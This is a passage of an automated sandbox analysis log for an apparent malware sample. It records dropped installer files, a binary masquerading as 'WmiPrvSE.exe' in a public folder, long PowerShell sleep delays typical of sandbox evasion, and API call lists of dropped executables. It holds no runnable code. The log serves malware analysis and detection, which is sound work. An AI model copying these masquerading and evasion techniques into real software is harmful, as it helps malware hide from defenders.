                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4060.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FB2.tmpJump to dropped file
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0076FA1C23_2_0076FA1C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep count: 5726 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep count: 3884 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1992Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1160Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3580Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1736Thread sleep count: 4162 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -900000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -899796s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -899669s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3340Thread sleep count: 1016 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1976Thread sleep count: 5060 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -18446744073709540s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -900000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -899859s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -899695s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -899577s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -899465s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -899343s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -899234s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -899124s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -899009s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -898890s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -898765s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep count: 1347 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -898640s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -898522s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -898406s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -898294s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -898136s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -898001s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -897843s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -897718s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -897600s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -897484s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -897374s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -897261s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -897149s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -897043s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -896922s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -896812s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -896702s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -896593s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -896482s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -896374s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -896265s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -896134s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 7253 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -24903104499507879s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -900000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -899874s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -899762s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -899640s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep count: 1393 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -899531s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -899421s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -899306s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -899201s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -899093s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -898984s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -898869s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -898758s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -898654s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -898491s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -898354s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -898248s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -898131s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -898015s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -897897s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -897795s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -897684s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -897578s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -897448s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -897340s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -897233s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -897112s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -897000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -896890s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -896779s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -896671s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -896562s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -896432s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep count: 5906 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -19369081277395017s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -900000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -899889s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -899781s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -899665s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep count: 1752 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -899561s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -899453s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -899344s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -899219s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -899109s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -898997s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -898850s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -898714s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -898576s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -898466s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -898359s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -898242s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -898125s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -898015s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -897902s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -897795s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -897672s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -897563s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -897453s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -897343s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -897234s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -897105s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -897000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -896890s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -896770s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 8199 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 1208 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4452Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Users\Public\WmiPrvSE.exe TID: 7696Thread sleep count: 1847 > 30
                Source: C:\Users\Public\WmiPrvSE.exe TID: 7696Thread sleep time: -18470000s >= -30000s
                Source: C:\Users\Public\WmiPrvSE.exe TID: 4788Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\WmiPrvSE.exe TID: 7696Thread sleep count: 8069 > 30
                Source: C:\Users\Public\WmiPrvSE.exe TID: 7696Thread sleep time: -80690000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Users\Public\WmiPrvSE.exeLast function: Thread delayed
                Source: C:\Users\Public\WmiPrvSE.exeLast function: Thread delayed
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0007A1F0 FindFirstFileW,CreateFileW,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,GetModuleFileNameW,SetCurrentDirectoryW,OpenMutexW,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,FindClose,4_2_0007A1F0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0007C450 DeleteFileW,FindFirstFileW,FindNextFileW,FindClose,PathIsDirectoryW,4_2_0007C450
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00084AF0 FindFirstFileW,GetLastError,FindClose,4_2_00084AF0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00091870 FindFirstFileW,FindClose,FindClose,4_2_00091870
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A60A0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,4_2_000A60A0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000E4329 FindFirstFileExW,4_2_000E4329
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A48F0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,4_2_000A48F0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A4CC0 FindFirstFileW,FindClose,4_2_000A4CC0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0009CE70 FindFirstFileW,FindClose,4_2_0009CE70
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000619C0 FindFirstFileW,FindNextFileW,FindClose,4_2_000619C0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00081D00 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,4_2_00081D00
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00085E00 FindFirstFileW,FindClose,4_2_00085E00
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2440BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7BB2440BC
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB25B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7BB25B190
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB26FCA0 FindFirstFileExA,5_2_00007FF7BB26FCA0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00779220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,23_2_00779220
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00771C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,23_2_00771C30
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A3790 _wcsrchr,_wcsrchr,GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,4_2_000A3790
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000B1900 GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,GetModuleHandleA,GetProcAddress,GlobalMemoryStatus,4_2_000B1900
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899796Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899669Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899859
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899695
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899577
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899465
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899343
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899234
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899124
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899009
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898890
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898765
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898640
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898522
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898406
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898294
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898136
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898001
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897843
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897718
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897600
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897484
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897374
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897261
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897149
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897043
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896922
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896812
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896702
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896593
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896482
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896374
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896265
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896134
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899874
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899762
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899640
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899531
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899421
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899306
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899201
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899093
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898984
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898869
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898758
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898654
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898491
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898354
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898248
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898131
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898015
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897897
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897795
